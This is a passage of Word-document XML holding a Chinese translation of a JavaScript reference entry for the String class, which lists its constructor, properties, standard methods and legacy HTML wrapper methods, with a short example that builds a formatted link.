        <w:t>/\//g</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="753" w:name="String"/>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="753"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>字符串支持</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String(s)//</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function String(s)//</w:t>
      </w:r>
      <w:r>
        <w:t>转换函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pP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s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>待存储到一个</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>对象中或转换为一个原始字符串的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符将</w:t>
      </w:r>
      <w:r>
        <w:t>String()</w:t>
      </w:r>
      <w:r>
        <w:t>作为一个构造函数使用时，它将返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>对象，内容为字符串</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>的字符串表示。当不带</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符调用</w:t>
      </w:r>
      <w:r>
        <w:t>String()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数时，它只是简单地将</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>转换为原始字符串并返回转换后的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该字符串中的字符数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>charAt()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>取出一个字符串中指定位置的字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>charCodeAt()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个字符串中指定位置的字符的编码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>concat()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个或多个值连接成一个字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>indexOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在指定字符串中寻找一个字符或子串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>lastIndexOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在指定字符串中向后寻找一个字符或子串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>localeCompare()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用本地定义的顺序比较字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>match()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用正则表达式执行模式匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用正则表达式执行查找与替换操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>search()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在一个字符串中查找匹配某个正则表达式的子串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回字符串的一个切片或子串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>split()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在指定的分隔符字符串或正则表达式处断开，将一个字符串分割为由字符串组成的数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>substr()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>提取字符串的一个子串，</w:t>
      </w:r>
      <w:r>
        <w:t>substring()</w:t>
      </w:r>
      <w:r>
        <w:t>的一个变体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>substring()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>提取字符串的一个子串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toLowerCase()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回指定字符串的一份副本，其中所有的字符都已转换为小写。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回原始的字符串值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toUpperCase()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回指定字符串的一份副本，其中所有的字符都已转换为大写。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>trim()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回指定字符串的</w:t>
      </w:r>
      <w:r>
        <w:t>一份副本，其中前后的空白字符都已删除。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回原始的字符串值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>静态方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String.fromCharCode()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用作为参数传入的字符编码创建一个新的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从早期的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>开始，</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>类就定义了若干方法，将字符串置入</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签以返回一个修改的字符串。这些方法一直没有成为</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>的标准，但在客户端或服务器端的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中动态生成</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>时非常有用。如果想使用非标准的方法，可以使用类似这样的代码来创建一个粗体的红色的超链接的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>源码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s="click here!";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var html=s.bold().link("javascript:alert('hello')").fontcolor("red");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于这些不是标准方法，因此在接下来的页面中它们没有单独的参考条目：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>anchor(name)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回该字符串的一个副本，在一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>a name=</w:t>
      </w:r>
      <w:r>
        <w:t>＞环境中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>big()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回该字符串的一个副本，在一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>big</w:t>
      </w:r>
      <w:r>
        <w:t>＞环境中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>blink()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回该字符串的一个副本，在一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>blink</w:t>
      </w:r>
      <w:r>
        <w:t>＞环境中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>bold()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回该字符串的一个副本，在一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>＞环境中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>fixed()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回该字符串的一个副本，在一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>tt</w:t>
      </w:r>
      <w:r>
        <w:t>＞环境中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>fontcolor(color)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回该字符串的一个副本，在一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>font color=</w:t>
      </w:r>
      <w:r>
        <w:t>＞环境中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>fontsize(size)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回该字符串的一个副本，在一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>font size=</w:t>
      </w:r>
      <w:r>
        <w:t>＞环境中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>italics()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回该字符串的一个副本，在一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>＞环境中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>link(url)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回该字符串的一个副本，在一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>a href=</w:t>
      </w:r>
      <w:r>
        <w:t>＞环境中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>small()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回该字符串的一个副本，在一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>small</w:t>
      </w:r>
      <w:r>
        <w:t>＞环境</w:t>
      </w:r>
      <w:r>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>strike()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回该字符串的一个副本，在一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>strike</w:t>
      </w:r>
      <w:r>
        <w:t>＞环境中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>sub()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回该字符串的一个副本，在一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>sub</w:t>
      </w:r>
      <w:r>
        <w:t>＞环境中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>sup()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回该字符串的一个副本，在一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>sup</w:t>
      </w:r>
      <w:r>
        <w:t>＞环境中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的一种原始数据类型。</w:t>
      </w:r>
      <w:r>
